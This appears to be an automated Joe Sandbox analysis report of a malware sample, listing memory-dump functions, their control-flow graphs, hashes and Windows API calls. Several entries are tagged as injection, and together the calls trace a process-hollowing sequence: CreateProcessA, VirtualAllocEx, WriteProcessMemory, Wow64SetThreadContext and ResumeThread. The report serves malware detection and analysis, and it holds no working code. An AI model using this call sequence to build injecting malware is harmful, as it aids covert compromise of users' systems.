                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 477 26e1188-26e121d 479 26e121f-26e1229 477->479 480 26e1256-26e1276 477->480 479->480 481 26e122b-26e122d 479->481 485 26e12af-26e12de 480->485 486 26e1278-26e1282 480->486 483 26e122f-26e1239 481->483 484 26e1250-26e1253 481->484 487 26e123d-26e124c 483->487 488 26e123b 483->488 484->480 496 26e1317-26e13d1 CreateProcessA 485->496 497 26e12e0-26e12ea 485->497 486->485 489 26e1284-26e1286 486->489 487->487 490 26e124e 487->490 488->487 491 26e1288-26e1292 489->491 492 26e12a9-26e12ac 489->492 490->484 494 26e1296-26e12a5 491->494 495 26e1294 491->495 492->485 494->494 498 26e12a7 494->498 495->494 508 26e13da-26e1460 496->508 509 26e13d3-26e13d9 496->509 497->496 499 26e12ec-26e12ee 497->499 498->492 501 26e12f0-26e12fa 499->501 502 26e1311-26e1314 499->502 503 26e12fe-26e130d 501->503 504 26e12fc 501->504 502->496 503->503 505 26e130f 503->505 504->503 505->502 519 26e1462-26e1466 508->519 520 26e1470-26e1474 508->520 509->508 519->520 523 26e1468 519->523 521 26e1476-26e147a 520->521 522 26e1484-26e1488 520->522 521->522 524 26e147c 521->524 525 26e148a-26e148e 522->525 526 26e1498-26e149c 522->526 523->520 524->522 525->526 527 26e1490 525->527 528 26e14ae-26e14b5 526->528 529 26e149e-26e14a4 526->529 527->526 530 26e14cc 528->530 531 26e14b7-26e14c6 528->531 529->528 532 26e14cd 530->532 531->530 532->532
                                                    APIs
                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 026E13BE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1240055630.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_26e0000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: CreateProcess
                                                    • String ID:
                                                    • API String ID: 963392458-0
                                                    • Opcode ID: 13a810cbe53c9160aca8b0b009f2f88fb1fc1f259fcf2cf12e701f6ac1e6d61b
                                                    • Instruction ID: 3be135b57ad5c55460780b26e28c5fa241f141ce2f82143021cea6e5f6e20a0e
                                                    • Opcode Fuzzy Hash: 13a810cbe53c9160aca8b0b009f2f88fb1fc1f259fcf2cf12e701f6ac1e6d61b
                                                    • Instruction Fuzzy Hash: D7913B71D01219CFEF24CF68C881BEEBBB2AF49314F1481A9E819A7340DB759985DF91
                                                    Function 00DB3414 Relevance: 1.6, APIs: 1, Instructions: 119COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 534 db3414-db3415 535 db3417-db3419 534->535 536 db33d4-db33e1 534->536 537 db341b-db34e1 CreateActCtxA 535->537 540 db33ea-db340b 536->540 541 db33e3-db33e9 536->541 542 db34ea-db3544 537->542 543 db34e3-db34e9 537->543 541->540 551 db3553-db3557 542->551 552 db3546-db3549 542->552 543->542 553 db3559-db3565 551->553 554 db3568-db357e 551->554 552->551 553->554
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 00DB34D1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1239905303.0000000000DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_db0000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: 8bd3b6cb021440448dc0e1567a3425ebbf61d33f7af9ffe63ee29cb345fa79e3
                                                    • Instruction ID: d586b829f60eeba72f2b55990b36be3ae33fb1b9a72747abc11e916435b973d4
                                                    • Opcode Fuzzy Hash: 8bd3b6cb021440448dc0e1567a3425ebbf61d33f7af9ffe63ee29cb345fa79e3
                                                    • Instruction Fuzzy Hash: 4741E271C00719CFEB24DFA9C8447DEBBF5AF48314F24846AD409AB251DB756A4ACF60
                                                    Function 00DB1FB8 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 560 db1fb8-db34e1 CreateActCtxA 563 db34ea-db3544 560->563 564 db34e3-db34e9 560->564 571 db3553-db3557 563->571 572 db3546-db3549 563->572 564->563 573 db3559-db3565 571->573 574 db3568-db357e 571->574 572->571 573->574
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 00DB34D1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1239905303.0000000000DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_db0000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: fb7e2bfe05a7da35bd9d7563121ff39b28fa1b45613738707003dc5633aac7e3
                                                    • Instruction ID: f6015b732aa2239053be78ad28a08c44858490e7108ed6fc233a6e221d2a0d10
                                                    • Opcode Fuzzy Hash: fb7e2bfe05a7da35bd9d7563121ff39b28fa1b45613738707003dc5633aac7e3
                                                    • Instruction Fuzzy Hash: 4141B271C00719CBEB24DFA9C844BDEBBF5BF48304F20856AD409AB251DBB56946CFA0
                                                    Function 026E0AF8 Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 580 26e0af8-26e0b4e 582 26e0b5e-26e0b9d WriteProcessMemory 580->582 583 26e0b50-26e0b5c 580->583 585 26e0b9f-26e0ba5 582->585 586 26e0ba6-26e0bd6 582->586 583->582 585->586
                                                    APIs
                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 026E0B90
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1240055630.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_26e0000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessWrite
                                                    • String ID:
                                                    • API String ID: 3559483778-0
                                                    • Opcode ID: 2e5a362756cd108dd00b40dfa58c29279f30963ac8d7642dd9c6b35f9182d11a
                                                    • Instruction ID: 6289139663d0e61694b1a8c2eda88a1bd1e655f79d58904f4ef001331b39d154
                                                    • Opcode Fuzzy Hash: 2e5a362756cd108dd00b40dfa58c29279f30963ac8d7642dd9c6b35f9182d11a
                                                    • Instruction Fuzzy Hash: 85212371D0034A9FDB10CFA9C881BEEBBF1FB48314F50842AE959A7241D7799945CBA0
                                                    Function 026E0B00 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 590 26e0b00-26e0b4e 592 26e0b5e-26e0b9d WriteProcessMemory 590->592 593 26e0b50-26e0b5c 590->593 595 26e0b9f-26e0ba5 592->595 596 26e0ba6-26e0bd6 592->596 593->592 595->596
                                                    APIs
                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 026E0B90
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1240055630.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_26e0000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessWrite
                                                    • String ID:
                                                    • API String ID: 3559483778-0
                                                    • Opcode ID: a886e0756c879b09120ad33836e15fcfd0c34f08ea5664d1f9ad8d9f85d9c595
                                                    • Instruction ID: f719fe2baeabe13ff0f0ec46a18794efac6228a0bef5c14b62cbb5b94700d5f1
                                                    • Opcode Fuzzy Hash: a886e0756c879b09120ad33836e15fcfd0c34f08ea5664d1f9ad8d9f85d9c595
                                                    • Instruction Fuzzy Hash: 12211375D003499FDF10DFAAC881BDEBBF5FB48314F50842AE959A7240D7799940CBA4
                                                    Function 026E0BE8 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 600 26e0be8-26e0c7d ReadProcessMemory 604 26e0c7f-26e0c85 600->604 605 26e0c86-26e0cb6 600->605 604->605
                                                    APIs
                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 026E0C70
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1240055630.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_26e0000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessRead
                                                    • String ID:
                                                    • API String ID: 1726664587-0
                                                    • Opcode ID: 0841d7b7052219fef2f4cfcb5acd1d09d4c1f8751bfe4347f6b6f86f4af26d11
                                                    • Instruction ID: 3e59e8a687e49783e35e3168ce9e028ec1cb453bf2d1327c76f84d35b83effcf
                                                    • Opcode Fuzzy Hash: 0841d7b7052219fef2f4cfcb5acd1d09d4c1f8751bfe4347f6b6f86f4af26d11
                                                    • Instruction Fuzzy Hash: 4E2127B1C013499FDB10DFAAC981BEEBBF5FF48310F50842AE959A7240C7799545CBA4
                                                    Function 026E0BF0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 619 26e0bf0-26e0c7d ReadProcessMemory 622 26e0c7f-26e0c85 619->622 623 26e0c86-26e0cb6 619->623 622->623
                                                    APIs
                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 026E0C70
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1240055630.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_26e0000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessRead
                                                    • String ID:
                                                    • API String ID: 1726664587-0
                                                    • Opcode ID: 7839dcda41568fe2fd2a26894ee17ccb345a0a2887074fa4c0af2ce8e5af74c5
                                                    • Instruction ID: 870f6d8642bed3e0d91eb782cc5cf85610839868a3be6349e24e1de7bc37a622
                                                    • Opcode Fuzzy Hash: 7839dcda41568fe2fd2a26894ee17ccb345a0a2887074fa4c0af2ce8e5af74c5
                                                    • Instruction Fuzzy Hash: 99211671C003499FDB10DFAAC981BDEBBF5FF48310F508429E919A7240C7799905CBA4
                                                    Function 026E0968 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 609 26e0968-26e09b3 611 26e09b5-26e09c1 609->611 612 26e09c3-26e09f3 Wow64SetThreadContext 609->612 611->612 614 26e09fc-26e0a2c 612->614 615 26e09f5-26e09fb 612->615 615->614
                                                    APIs
                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 026E09E6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1240055630.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_26e0000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: ContextThreadWow64
                                                    • String ID:
                                                    • API String ID: 983334009-0
                                                    • Opcode ID: 7e0d1aba89739431cd9e056338f8fae2a2840396b451047e1e0ade9d48aaef79
                                                    • Instruction ID: 64b20f8ba4fce7e4278a5a9c5144f03793b6fe61620899daefedd63ee9c29203
                                                    • Opcode Fuzzy Hash: 7e0d1aba89739431cd9e056338f8fae2a2840396b451047e1e0ade9d48aaef79
                                                    • Instruction Fuzzy Hash: 72213471D003098FDB10DFAAC585BAEBBF4AB58224F54842AD459A7340CB78A945CFA4
                                                    Function 00DBE258 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 627 dbe258-dbe2ec DuplicateHandle 628 dbe2ee-dbe2f4 627->628 629 dbe2f5-dbe312 627->629 628->629
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00DBE2DF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1239905303.0000000000DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_db0000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: d72e2b07718010960abd537190a1a64b5aab09c0381e039cf79e67f835091092
                                                    • Instruction ID: 78d7d17f407993f4f5aad1b5dcc6cbee708b625d7d42ec166114105de01b27c8
                                                    • Opcode Fuzzy Hash: d72e2b07718010960abd537190a1a64b5aab09c0381e039cf79e67f835091092
                                                    • Instruction Fuzzy Hash: 9621E3B5D002499FDB10CF9AD984ADEBBF8EB48310F14801AE919A3350D379A940CFA4
                                                    Function 026E0961 Relevance: 1.6, APIs: 1, Instructions: 61threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 026E09E6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1240055630.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_26e0000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: ContextThreadWow64
                                                    • String ID:
                                                    • API String ID: 983334009-0
                                                    • Opcode ID: 3135a580d5876fad51a406fc791a21fb5c40add3f3bc667b123d44e463568eb0
                                                    • Instruction ID: ebe3c974994c2fe8a80d911f452c609665381ef2a3340d92f1335eb4a7bc18f7
                                                    • Opcode Fuzzy Hash: 3135a580d5876fad51a406fc791a21fb5c40add3f3bc667b123d44e463568eb0
                                                    • Instruction Fuzzy Hash: 3E215471E003098FEB10CFA9C1817EEBBF0AF58214F60C42AD459AB241CB799946CF94
                                                    Function 026E0A40 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 026E0AAE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1240055630.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_26e0000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: e821dc5a94e8b688007b1f8f5a6f7f8f64ea853d7420ffdcd02111e805f595af
                                                    • Instruction ID: 45dde7082f1d7629a4c452138352d7a6543e5aa1d5ed01122451617e931d4705
                                                    • Opcode Fuzzy Hash: e821dc5a94e8b688007b1f8f5a6f7f8f64ea853d7420ffdcd02111e805f595af
                                                    • Instruction Fuzzy Hash: E3112671D003499FDF20DFAAC845BDEBBF5EB48320F148419E519A7250CB75A940CFA4
                                                    Function 026E0A39 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 026E0AAE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1240055630.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_26e0000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: f1a1d9acf9712bb7d93805780c943c3834882efd0a3bd046c23d5785e4a7a15c
                                                    • Instruction ID: 9037d28a68c038daebdc0d308ed98c50419dee980da5badb0be5542d8410c40d
                                                    • Opcode Fuzzy Hash: f1a1d9acf9712bb7d93805780c943c3834882efd0a3bd046c23d5785e4a7a15c
                                                    • Instruction Fuzzy Hash: 34115372E003498FCF20CFA9C840BDEBBF1AF48314F24885ED556A7251CB7A9505CBA0
                                                    Function 026E4980 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindCloseChangeNotification.KERNELBASE(?), ref: 026E49E0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1240055630.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_26e0000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: ChangeCloseFindNotification
                                                    • String ID:
                                                    • API String ID: 2591292051-0
                                                    • Opcode ID: 28e62ef1c0f181163c9a82a70bcc14538f1a67f8161af69216b25ab89ef2a2be
                                                    • Instruction ID: 73b960e5449c28d82f0c77db1de509c41c5085dc383d6f6237938e5358cdbf87
                                                    • Opcode Fuzzy Hash: 28e62ef1c0f181163c9a82a70bcc14538f1a67f8161af69216b25ab89ef2a2be
                                                    • Instruction Fuzzy Hash: B21116B58003499FCB20DFA9D585BDEBBF4FB48320F24841AD559A7240CB39A945CFA5
                                                    Function 00DBC2C8 Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryExW.KERNELBASE(00000000,?,?), ref: 00DBC332
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1239905303.0000000000DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_db0000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    • Opcode ID: cfe58fc7c74c80d9a1d26f6396d4d685155724621588cfef0b672431f8094675
                                                    • Instruction ID: a3b56bce678a9978b0cf9f15ffb85b210e0b410a7259922702020bbbed34a0a5
                                                    • Opcode Fuzzy Hash: cfe58fc7c74c80d9a1d26f6396d4d685155724621588cfef0b672431f8094675
                                                    • Instruction Fuzzy Hash: 4A11E2B6C003498FDB20CF9AC444ADEFBF4AB88310F54842AD519A7300C779A945CFA5
                                                    Function 00DBB824 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,00DBBE6C), ref: 00DBC0A6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1239905303.0000000000DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_db0000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: ac99e97398dcdb29d0d7dbe2297b8a12f6230e42eea4697d288aa10c015cc9c8
                                                    • Instruction ID: e05e0ee670d9e0a649f114c4ae503287ecb17e8d8cacb09f738ba38baf3f3946
                                                    • Opcode Fuzzy Hash: ac99e97398dcdb29d0d7dbe2297b8a12f6230e42eea4697d288aa10c015cc9c8
                                                    • Instruction Fuzzy Hash: 5E11EFB5C10249CBDB20EF9AC444BDEBBF4EB88314F14842AD859B7200D379A945CFA5
                                                    Function 026E08B1 Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1240055630.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_26e0000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0
                                                    • Opcode ID: 78a73e8da20d6e5e12b77d75bdd7edbbb21b44a5f4302afe347333dc0d336f4d
                                                    • Instruction ID: 266a64f155a936ba1d6d094ba8e080f9a86ccf8b9ed52b9ef3a1647be09faf97
                                                    • Opcode Fuzzy Hash: 78a73e8da20d6e5e12b77d75bdd7edbbb21b44a5f4302afe347333dc0d336f4d
                                                    • Instruction Fuzzy Hash: C61146B1D003498FDB20DFAAC4457EEBBF4AB98314F14841AD459A7240CB796905CF94
                                                    Function 026E08B8 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1240055630.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_26e0000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0
                                                    • Opcode ID: a92227ca64860036aa71eb8ee60b0dbce9f35a565532e77f33cbd9338588d72c
                                                    • Instruction ID: 84394153a5c45b6a7fd2f8bd3dc681e02b9d7319c07c3b97d58458dffaf14d07
                                                    • Opcode Fuzzy Hash: a92227ca64860036aa71eb8ee60b0dbce9f35a565532e77f33cbd9338588d72c
                                                    • Instruction Fuzzy Hash: DB1125B1D003498FDB20DFAAC4457AEFBF5AB88224F248419D519A7240CB79A945CFA4
                                                    Function 026E3570 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 026E35D5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1240055630.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_26e0000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: MessagePost
                                                    • String ID:
                                                    • API String ID: 410705778-0
                                                    • Opcode ID: 14590aaab3a950de25aaee039a58c3fb7586ca8d24b203f4495db7f51c087272
                                                    • Instruction ID: 7c2c12260145a8da1468e890a1044203b8a10be3dd2c4befab0a9a177bc753d6
                                                    • Opcode Fuzzy Hash: 14590aaab3a950de25aaee039a58c3fb7586ca8d24b203f4495db7f51c087272
                                                    • Instruction Fuzzy Hash: 491116B58003499FCB20CF9AC945BDEFBF8EB48320F108459E558A7340C375A540CFA1
                                                    Function 026E4988 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindCloseChangeNotification.KERNELBASE(?), ref: 026E49E0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1240055630.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_26e0000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: ChangeCloseFindNotification
                                                    • String ID:
                                                    • API String ID: 2591292051-0
                                                    • Opcode ID: 7ea456428ba183e5a1ddc3b15be3226aee1a0da953aade2f680603b9983684e7
                                                    • Instruction ID: c7e32b4ec12e9d0942b1eafd70548d043fe257c90de5a228f52270a7ad26dac7
                                                    • Opcode Fuzzy Hash: 7ea456428ba183e5a1ddc3b15be3226aee1a0da953aade2f680603b9983684e7
                                                    • Instruction Fuzzy Hash: F311F2B58003498FDB20DF9AC585BDEBBF4FB48320F20841AD959A7340D779A945CFA5
                                                    Function 026E0D9C Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 026E35D5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1240055630.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_26e0000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: MessagePost
                                                    • String ID:
                                                    • API String ID: 410705778-0
                                                    • Opcode ID: 92ba65db8e02a020939b76b7d54e3fe7bab984312b6853bb2d71ab25382f4ef2
                                                    • Instruction ID: 9967c47a3010411b0d20ecd8b9f8016e727608624638cfebdb41d3a044df7ecd
                                                    • Opcode Fuzzy Hash: 92ba65db8e02a020939b76b7d54e3fe7bab984312b6853bb2d71ab25382f4ef2
                                                    • Instruction Fuzzy Hash: 391103B58003499FDB20DF9AC985BEEBBF8EB48324F10845AE519A7340C375A954CFA1
                                                    Function 00CAD1FC Relevance: .1, Instructions: 76COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1239673856.0000000000CAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CAD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cad000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 23d9e29c5b9480d70d43c9da57e4c10e1f0411398cb04a6ed10dcb8d3fc5c619
                                                    • Instruction ID: adfd5cbee98f181348ffb48964caf95633149e4a6ac55f910ffbf5a452f3d086
                                                    • Opcode Fuzzy Hash: 23d9e29c5b9480d70d43c9da57e4c10e1f0411398cb04a6ed10dcb8d3fc5c619
                                                    • Instruction Fuzzy Hash: C62103B2504301DFDB05DF50D9C4B2ABB65FB89318F20C6A9E94B0B646C336DC16CBA2
                                                    Function 00CAD3D8 Relevance: .1, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1239673856.0000000000CAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CAD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cad000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d790ffc9eedf1906c6378eaced63ff8f47d2033c632e5ab49a37c0669bbdecf0
                                                    • Instruction ID: 21db6fcf341518fbbd97b75a552420ae50003c7fafa6f861cbb0fbde7d07fdb5
                                                    • Opcode Fuzzy Hash: d790ffc9eedf1906c6378eaced63ff8f47d2033c632e5ab49a37c0669bbdecf0
                                                    • Instruction Fuzzy Hash: 6C210375604305DFDB14DF10D9C4B16BB65FB99328F20C169E80B0F656C336E856CAA2
                                                    Function 00CBD01C Relevance: .1, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1239716126.0000000000CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cbd000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4a0a15603a380fcdbc36013c4c66bb700035dc65184bae8400549d45967574c0
                                                    • Instruction ID: 84b36e2203a5f670378c515a34d7e51dcd96b0b345012c729a9cdea108a49cc9
                                                    • Opcode Fuzzy Hash: 4a0a15603a380fcdbc36013c4c66bb700035dc65184bae8400549d45967574c0
                                                    • Instruction Fuzzy Hash: 8C21F275604300DFDB14EF14E9C4B56BB65EB88324F24C5ADE84A4B286D33AD847CA62
                                                    Function 00CBD1D4 Relevance: .1, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1239716126.0000000000CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cbd000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b320adae6c8453c463bfad720243650d699b9315283d32ce8c8a49351a67d7e5
                                                    • Instruction ID: 731bd57ff94d3398006f3d1e93c04c19e8ea91557124616ead72ed27493a9153
                                                    • Opcode Fuzzy Hash: b320adae6c8453c463bfad720243650d699b9315283d32ce8c8a49351a67d7e5
                                                    • Instruction Fuzzy Hash: D5210475A04380EFDB15DF14D9C0B66BBA5FB84314F20C6ADE84A4B292D336DC46CB62
                                                    Function 00CBD005 Relevance: .1, Instructions: 62COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1239716126.0000000000CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
